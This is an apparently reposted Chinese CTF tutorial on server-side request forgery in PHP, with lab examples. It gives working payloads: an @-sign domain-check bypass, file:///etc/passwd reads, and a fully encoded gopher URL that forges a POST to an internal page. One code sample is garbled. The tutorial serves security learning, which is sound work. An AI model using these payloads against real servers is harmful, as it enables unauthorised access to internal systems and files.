【CTF】SSRF服务器端请求伪造

这篇具有很好参考价值的文章主要介绍了【CTF】SSRF服务器端请求伪造。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

SSRF 服务器端请求伪造(借刀沙人)

SSRF(全称Server-Side Request Forgery),即服务器端请求伪造,是一种利用漏洞来伪造服务器端发起请求的漏洞攻击。由于请求都是由内部发起的,所以一般情况下,SSRF漏洞攻击的目标往往是从外网无法正常访问的内部系统,因此可以总结为借刀kill人。

漏洞危害:

  • 扫描内网开放端口服务
  • 向内网中的任意主机的任意端口发送payload来攻击内网服务
  • 向内网发动DOS攻击
  • 攻击内网的Web应用(如直接SQL注入、XSS攻击等)
  • 利用file、gopher、dict协议来读取本地文件、执行命令等

漏洞原理:

SSRF漏洞原理就是将发起请求的服务器当作跳板,从而可以由其来攻击内网中的一些其他服务。

从pikachu中来看:

PHP中下面函数的使用不当会导致SSRF:
file_get_contents()
fsockopen()
curl_exec()

例子:

// 请求对方页面前端源代码,在当前页码进行展示
<?php
function curl($url){
    // 创建一个新的curl资源
    $ch = curl_init();
    // 设置URL和相应的选项
    curl_setopt($ch, option:CIRLOPT_URL, &url);
    curl_setopt($ch, option:CIRLOPT_HEADER, value:false);
    // 抓取url并把它传递给浏览器
    curl_exec($ch);
    // 关闭curl资源,并且释放系统资源
    curl_close($ch);
}
url = $_GET['url'];
curl($url);
?>
利用一个网站:www.cip.cc来理解SSRF漏洞,首先使用我的本机访问该网站,会发现网站上回显的IP地址和信息都是我本机的:

ctf ssrf,web学习,CTF,web安全,安全,网络安全,web
然后,使用百度翻译翻译页面功能来访问该页面,会发现此时的IP变为了百度的IP,也就是说这一个访问请求,其实是由百度的服务器来发起的,而不是攻击者。SSRF的原理就是将控制功能中发起请求的服务当作跳板攻击内网中的其他服务。

过滤绕过:

SSRF中当跳转被过滤,例如如果域名不是以xxx为开头的,就不让执行,那么此时就可以使用@符号来绕过:
?url=http://xxx@baidu.com
使用该方式,那么在解析域名时,会将@前的内容当作用户名密码。例如,此时限制了只能访问www.aaa.com域名地址,但是你想要访问www.bbb.com,就可以构造语句为:
?url=http://www.aaa.com@www.bbb.com
那么,此时curl识别到的域名地址为www.bbb.com,则可正常访问到它。

协议利用:

包括但不仅限于:

file协议:可以通过file协议来读取系统的文件内容

dict协议:字典服务器协议,让客户端能够访问更多字典源。在SSRF中可以获取目标服务器上运行的服务版本等信息

gopher协议:gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。使用gopher协议时,通过控制访问的URL可实现向指定的服务器发送任意内容,如HTTP请求、MySQL请求等,所以其攻击面非常之广。

此处我们先着重讲解一下file协议:

同样通过pikachu来进行测试,尝试访问我的服务器的/etc/passwd文件
ctf ssrf,web学习,CTF,web安全,安全,网络安全,web
此处可以发现,通过file协议构造payload:

?url=file:///etc/passwd

是读取到了我服务器的/etc/passwd的文件内容的,采取同样的方法,我是可以对我的服务器读取更多的文件内容的。

例题:

ctf ssrf,web学习,CTF,web安全,安全,网络安全,web
首先从题目来看,涉及到了ssrf漏洞的利用代码curl_exec

此处出现了一个函数parse_url(),该函数的功能为解析 URL 并返回关联数组,包含在 URL 中出现的各种组成部分,对严重不合格的 URL,parse_url() 可能会返回 false。 也就是说,此时我传入的url必须为一个符合规定格式的url地址,就比如以http://开头。

如果url格式不正确的话,就会返回一个"Can not parse url:".$_GET[‘url’]

从本题来看,他说他在baidu.com下放了一个flag.txt,但是试想一下,这个baidu.com是不可能为真正的百度的那个域名的,所以此处这个baidu.com应该为出题者所建的一个目录,所以就是ssrf读文件,我们就想到使用file协议来读取flag.txt这个文件。

并且,此处分析语句:

substr($_GET['url'], strlen('http://'), strlen('baidu.com')) === 'baidu.com'
等价于:substr(url,7,9) === 'baidu.com'

此处表示,截取所输入内容中的从第7位开始,长度为9的字符串,如果他的内容为baidu.com,那么程序也会die,而且我们所需要用的file://协议恰巧与http://协议长度相同,就很气人。

就想到需要绕过这个限制,使用我们上面有讲到的@符号来尝试,那么就构造payload:

?url=file://@baidu.com/flag.txt

ctf ssrf,web学习,CTF,web安全,安全,网络安全,web成功得到flag

ssrf打内网姿势:

例如当知道对应服务器内网的一个IP,即可通过ssrf点获取该内网IP的内容,进而利用内网中的一些语句,例如此时123.php是内网中的一个可以利用的页面:

ctf ssrf,web学习,CTF,web安全,安全,网络安全,web

此时源码若变为$_POST的形式来传入w,发现无法继续正常得到flag,即可引出以下内容:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jGQSmdAq-1680420003151)(…/AppData/Typora/typora-user-images/image-20230402144509798.png)]

ssrf打内网post传参:

此时需要使用gopher协议(万金油协议):

格式:
gopher://

ctf ssrf,web学习,CTF,web安全,安全,网络安全,web

gopher协议是Internet上一个非常有名的信息查找系统,其将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。允许用户使用层叠结构的菜单与文件,以发现和检索信息,它拥有世界上最大、最神奇的编目。

<?php
show_source(__FILE__);
function curl($url){
    //创建一个新的curl资源
    $ch = curl_init();
    //设置URL和相应的选项
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_HEADER,false);
    //抓取URL并把它传递给浏览器
    curl_exec($ch);
    //关闭curl资源,并且释放系统资源
    curl_close($ch);
}
$url = $_GET['url'];
curl($url);
?>

本地搭建以上代码运行

ctf ssrf,web学习,CTF,web安全,安全,网络安全,web

此时模拟内网环境下,有一个111.php,内容如下:

<?php
show_source(__FILE__);
echo file_get_contents($_POST[w]);

ctf ssrf,web学习,CTF,web安全,安全,网络安全,web

接下来就需要通过构造语句通过gopher协议来利用内网中的111.php文件,先构造一个简单包,使用burp抓取传参的数据包,并简化:

ctf ssrf,web学习,CTF,web安全,安全,网络安全,web

gopher协议需要进行编码,接下来需要将这个数据包中的空格替换成%20,换行替换成%0D%0A

POST%20/index.php/111.php?_ijt=5cbcuvrso4ghgg0j29db0oqcjb&_ij_reload=RELOAD_ON_SAVE%20HTTP/1.1%0D%0AHost:%20localhost:63342%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%205%0D%0A%0D%0Aw=111

接下来需要对其进行url编码,并且payload前还需要加内容,并对w所需得到的文件修改,同时修改Content-Length的值

payload:

gopher://localhost:63342/_POST%20/index.php/111.php?_ijt=5cbcuvrso4ghgg0j29db0oqcjb&_ij_reload=RELOAD_ON_SAVE%20HTTP/1.1%0D%0AHost:%20localhost:63342%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2010%0D%0A%0D%0Aw=flag.php

在进行url编码

http://localhost:63342/index.php/123.php?url=%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%36%33%33%34%32%2f%5f%50%4f%53%54%25%32%30%2f%69%6e%64%65%78%2e%70%68%70%2f%31%31%31%2e%70%68%70%3f%5f%69%6a%74%3d%35%63%62%63%75%76%72%73%6f%34%67%68%67%67%30%6a%32%39%64%62%30%6f%71%63%6a%62%26%5f%69%6a%5f%72%65%6c%6f%61%64%3d%52%45%4c%4f%41%44%5f%4f%4e%5f%53%41%56%45%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%3a%25%32%30%6c%6f%63%61%6c%68%6f%73%74%3a%36%33%33%34%32%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%25%32%30%31%30%25%30%44%25%30%41%25%30%44%25%30%41%77%3d%66%6c%61%67%2e%70%68%70

传入即可得到flag文章来源地址https://www.toymoban.com/news/detail-764513.html

到了这里,关于【CTF】SSRF服务器端请求伪造的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全进阶学习第四课——SSRF服务器请求伪造

    SSRF(Server-Side Request Forgery:服务器端请求伪造) 是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。 一般情况下, SSRF攻击的目标是从外网无法访问的内部系统,也就是内网。 利用一个可以发起网络请求的服务,当做跳板来攻击其它服务 SSRF 形

    2024年02月11日
    浏览(50)
  • 服务端请求伪造(SSRF)及漏洞复现

    服务器会根据用户提交的URL发送一个HTTP请求。使用用户指定的URL,Web应用可以获取图片或者文件资源等。典型的例子是百度识图功能。 如果没有对用户提交URL和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造\\\"的缺陷。“请求伪造”,顾名思义,攻击

    2024年02月09日
    浏览(41)
  • 服务端请求伪造(SSRF)及漏洞复现

    服务器会根据用户提交的URL 发送一个HTTP 请求。使用用户指定的URL,Web 应用可以获取图片或者文件资源等。典型的例子是百度识图功能。 如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造”的缺陷。“请求伪造”,顾名思义,

    2024年02月09日
    浏览(41)
  • 【SSRF漏洞-01】服务端请求伪造靶场实战

    SSRF(Server-Side Request Forgery, 服务端请求伪造) 是一种 由攻击者构造请求,由服务器端发起请求的安全漏洞,本质上是属于信息泄露漏洞 。如果“请求伪造”发生在服务器端,那么这个漏洞就叫做“服务器端请求伪造”即SSRF。 SSRF是一种攻击者发起的伪造由服务器端发起请求的

    2024年02月04日
    浏览(35)
  • 新后端漏洞之----SSRF漏洞(服务端请求伪造)

    这几天各种技术面试接踵而至,压得我喘不过气了!然后面试官问了我这个SSRF漏洞原理和利用方式以及防御手段,当然同时还问了好几个Top10漏洞! 危害:一个不符合预期的请求就可能导致整个内网沦陷 全名 :Server Side Request Forgery 基本原理:攻击者构造恶意的URL,由服务器

    2024年02月11日
    浏览(35)
  • CSRF(跨站请求伪造)和SSRF(服务端请求伪造)漏洞复现:风险与防护方法

    这篇文章旨在用于网络安全学习,请勿进行任何非法行为,否则后果自负。  环境准备 示例: 假设用户在银行网站A上登录并保持会话活动,同时他也在浏览其他网站。攻击者在一个不可信任的网站B上创建了一个恶意链接,当用户点击该链接时,会自动向银行网站A发送一个

    2024年02月10日
    浏览(58)
  • Java代码审计安全篇-SSRF(服务端请求伪造)漏洞

    前言:  堕落了三个月,现在因为被找实习而困扰,着实自己能力不足,从今天开始 每天沉淀一点点 ,准备秋招 加油 注意: 本文章参考qax的网络安全java代码审计,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误 SSRF漏洞  SSRF(Server-side Request

    2024年03月15日
    浏览(41)
  • API安全——SSRF服务端请求伪造的原理以及防范

    SSRF全称Server-Side Request Forgery,服务端请求伪造。 在最新的2023 OWASP中API 安全的Top10榜单中,ssrf排第7。 我们在开发过程中,通常使用API 获取远程时出现服务器端请求伪造 (SSRF) 缺陷 资源,而不验证用户提供的 URL。它使攻击者能够 强制应用程序将精心编制的请求发送到意外

    2024年02月12日
    浏览(41)
  • CTF之SSRF常见绕过

    1.绕过localhost和127.0.0.1 当程序中限制了我们使用localhost和127.0.0.1时,便可以利用进制转换来绕过 ip进制转换:https://tool.520101.com/wangluo/jinzhizhuanhuan 进制转换:https://www.sojson.com/hexconvert.html 2.CTFSHOW例题: 2.1 直接利用SSRF漏洞进行本地读取flag: 2.2 绕过localhost和127.0.0.1 2.3 绕过l

    2023年04月25日
    浏览(32)
  • 【burpsuite安全练兵场-服务端9】服务端请求伪造SSRF漏洞-7个实验(全)

       博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。 擅长:

    2024年02月02日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包